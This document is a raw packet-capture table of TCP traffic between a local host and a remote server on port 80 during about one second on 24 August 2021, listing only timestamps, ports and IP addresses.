Aug 24, 2021 08:49:13.768232107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.768244028 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.768249035 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.768256903 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.768284082 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.768320084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.768342972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.768362999 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.768367052 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.768369913 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.768394947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.768418074 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.768441916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.768465042 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.768465996 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.768472910 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.768491983 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.768517017 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.768541098 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.768556118 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.768562078 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.768568993 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.768594027 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.768616915 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.768641949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.768657923 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.768668890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.768681049 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.768692017 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.768716097 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.782381058 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.790889025 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.790932894 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.790960073 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.790985107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791012049 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791032076 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791060925 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791088104 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.791088104 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791110992 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.791132927 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.791135073 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791136980 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.791172028 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791198969 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791248083 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.791287899 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791320086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791348934 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791374922 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791376114 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.791382074 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.791403055 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791429996 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791457891 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791484118 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791511059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791517019 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.791523933 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.791543961 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791573048 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791599035 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791603088 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.791608095 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.791626930 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791655064 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791683912 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791711092 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791734934 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.791738033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791742086 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.791771889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791800022 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791826963 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791836023 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.791855097 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.791856050 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791886091 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791913033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791944027 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.791959047 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.791964054 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.791973114 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792004108 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792032003 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792059898 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792061090 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.792068005 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.792088032 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792114019 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792141914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792169094 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792195082 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.792198896 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792200089 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.792232037 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792260885 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792284012 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.792285919 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792289972 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.792315006 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792341948 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792371988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792397976 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792423010 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.792426109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792428970 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.792458057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792484045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792509079 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792521000 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.792536974 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792537928 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.792567015 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792586088 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792612076 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792615891 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.792623043 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.792639017 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792673111 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792684078 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792705059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792725086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792745113 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.792747021 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792773008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792798996 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792824030 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792850018 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792879105 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792889118 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.792906046 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792931080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792957067 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.792965889 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.792973042 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.792984009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793009043 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793034077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793059111 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793064117 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.793073893 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.793098927 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793126106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793152094 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793183088 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793190002 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.793198109 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.793214083 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793240070 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793267012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793278933 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.793284893 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.793294907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793322086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793349028 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793375969 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793399096 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.793405056 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793406010 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.793436050 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793463945 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793492079 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793518066 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793521881 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.793529034 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.793546915 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793576956 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793602943 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793627977 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.793633938 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.793634892 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793663979 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793689966 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793715000 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793742895 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793750048 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.793756962 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.793771982 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793798923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793824911 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793848991 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.793853998 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.793854952 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793891907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793919086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793945074 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793973923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.793998003 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.793998957 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.794003963 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.794029951 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.794056892 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.794083118 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.794085026 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.794090033 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.794114113 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.794142008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.794169903 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.794195890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.794219971 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.794223070 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.794226885 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.795162916 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.804649115 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.804686069 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.804708958 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.804730892 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.804853916 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.804874897 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.816596031 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.816658974 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.816734076 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.816785097 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.816792011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.816798925 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.816855907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.816904068 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.816919088 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.816958904 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817018032 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817084074 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817131042 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.817135096 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.817146063 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817209005 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817269087 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817342997 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817367077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817389011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817399979 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.817410946 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.817414045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817435980 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817460060 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817483902 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817506075 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817508936 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.817512035 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.817527056 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817552090 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817574024 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817578077 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.817580938 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.817595959 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817617893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817635059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817657948 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817673922 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.817678928 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.817679882 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817701101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817720890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817744017 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817759037 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.817763090 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.817765951 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817787886 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817810059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817831039 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817846060 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.817848921 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.817852020 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817873001 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817893982 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817914963 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.817918062 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817919970 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.817941904 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817964077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817985058 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.817998886 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.818001986 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.818007946 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818028927 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818052053 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818074942 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818098068 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.818099976 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818103075 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.818121910 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818144083 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818166971 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818182945 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.818186998 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.818188906 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818211079 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818232059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818253994 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818278074 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818299055 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.818300962 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818303108 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.818322897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818345070 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818365097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818367958 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.818372965 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.818387032 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818409920 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818430901 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818454981 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818470955 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.818475008 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.818476915 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818499088 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818520069 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818542957 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818551064 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.818556070 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.818563938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818584919 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818605900 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818617105 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.818619967 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.818630934 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818654060 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818675041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818698883 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818713903 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.818717957 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.818718910 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818739891 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818761110 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818782091 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818804979 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.818806887 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818809032 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:13.818830013 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818850040 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818871021 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:13.818892956 CEST	49712	80	192.168.2.5	212.224.105.79
